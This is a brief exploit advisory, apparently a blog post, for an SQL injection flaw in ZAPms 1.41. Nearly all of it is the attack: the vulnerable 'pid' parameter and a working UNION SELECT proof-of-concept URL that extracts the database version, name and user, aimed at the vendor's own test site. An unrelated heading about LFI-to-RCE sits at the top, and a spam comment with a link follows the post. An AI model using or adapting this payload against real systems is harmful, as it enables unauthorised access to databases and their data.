LFI to RCE via access_log injection

ZAPms 1.41 <= SQL Injection Vulnerability

[o] ZAPms <= SQL Injection Vulnerability

Software : ZAPms
Version   : 1.41
Vendor   : http://www.zapms.de/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/products?pid=[SQLi]


[o] PoC

 http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product

Comments

Unknown said…
I just want to say thanks for your wonderful post, it is contain a lot of knowledge and information that i needed right now. Thanks!
http://www.giochi-delle-winx.com/